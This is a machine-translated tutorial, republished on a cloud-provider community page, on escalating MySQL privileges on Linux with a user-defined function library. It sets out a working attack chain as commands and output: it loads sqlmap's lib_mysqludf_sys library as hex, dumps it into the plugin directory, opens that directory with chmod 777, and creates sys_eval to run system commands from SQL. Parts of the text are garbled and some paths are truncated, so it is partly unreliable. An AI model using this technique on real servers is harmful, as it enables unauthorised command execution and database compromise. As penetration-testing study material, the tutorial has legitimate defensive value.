Linux uses the UDF library to implement Mysql Elevation of Privilege

Source: Internet
Author: User

OS: linux (bt5)
Database: mysql
Brief description:
The user-defined library function is used to execute arbitrary programs. The test is passed only in linux. The dll used is naturally different in windows.
The mysql database must have a func table, and the UDF will be disabled when the function has been enabled using the primary key grant role tables;
Process: Obtain the path of the plug-in library and find the udf library file of the corresponding operating system. Use the udf library file to load the function and execute the command.

1. Obtain the plug-in library path.

mysql> show variables like "%plugin%";+---------------+-----------------------+| Variable_name | Value         |+---------------+-----------------------+| plugin_dir  | /usr/lib/mysql/plugin |+---------------+-----------------------+1 row in set (0.00 sec)

2. Find the udf library file of the corresponding operating system.
Because I tested it myself, I checked my system version, 64-bit

root@bt:~# uname -aLinux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux

Udf files are included in the sqlmap tool. You only need to find the version of the corresponding operating system.

root@bt:/pentest/database/sqlmap/udf/mysql# lslinux windowsroot@bt:/pentest/database/sqlmap/udf/mysql/linux# ls32 64root@bt:/pentest/database/sqlmap/udf/mysql/linux/64#

3. Use the udf library file to load the function and execute the command
First, you must obtain the hexadecimal format of the udf library file.

mysql> select hex(load_file('/pentest/database/sqlmap/udf/mysql/linux/64/')) into outfile '/tmp/udf.txt';Query OK, 1 row affected (0.04 sec)

During the test, the built-in account and account name mysql are not root, so the plug-in directory cannot be written. In reality, generally, the udf privilege escalation is a mysql program started with the root permission, therefore, there is no situation where directory permissions are insufficient and cannot be accessed. To continue, modify directory permissions
Root @ bt :~ # Chmod 777/usr/lib/mysql/plugin
Write the udf Library to the mysql database directory in the database:

mysql> select unhex('7F454C46020...') into dumpfile '/usr/lib/mysql/plugin/';Query OK, 1 row affected (0.04 sec)

View the functions supported by this udf library.

root@bt:~# nm -D /usr/lib/mysql/plugin/         w _Jv_RegisterClasses0000000000201788 A __bss_start         w __cxa_finalize         w __gmon_start__0000000000201788 A _edata0000000000201798 A _end0000000000001178 T _fini0000000000000ba0 T _init         U fgets         U fork         U free         U getenv000000000000101a T lib_mysqludf_sys_info0000000000000da4 T lib_mysqludf_sys_info_deinit0000000000001047 T lib_mysqludf_sys_info_init         U malloc         U mmap         U pclose         U popen         U realloc         U setenv         U strcpy         U strncpy0000000000000dac T sys_bineval0000000000000dab T sys_bineval_deinit0000000000000da8 T sys_bineval_init0000000000000e46 T sys_eval0000000000000da7 T sys_eval_deinit0000000000000f2e T sys_eval_init0000000000001066 T sys_exec0000000000000da6 T sys_exec_deinit0000000000000f57 T sys_exec_init00000000000010f7 T sys_get0000000000000da5 T sys_get_deinit0000000000000fea T sys_get_init000000000000107a T sys_set00000000000010e8 T sys_set_deinit0000000000000f80 T sys_set_init         U sysconf         U system         U waitpid

Finally, load the function and execute:

mysql> create function sys_eval returns string soname "";Query OK, 0 rows affected (0.14 sec) mysql> select sys_eval('whoami');+--------------------+| sys_eval('whoami') |+--------------------+| mysql       |+--------------------+1 row in set (0.04 sec) mysql> select * from mysql.func;+----------+-----+-------------+----------+| name   | ret | dl     | type   |+----------+-----+-------------+----------+| sys_eval |  0 | | function |+----------+-----+-------------+----------+1 row in set

Related Article

E-Commerce Solutions

Leverage the same tools powering the Alibaba Ecosystem

Learn more >

Apsara Conference 2019

The Rise of Data Intelligence, September 25th - 27th, Hangzhou, China

Learn more >

Alibaba Cloud Free Trial

Learn and experience the power of Alibaba Cloud with a free trial worth $300-1200 USD

Learn more >

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.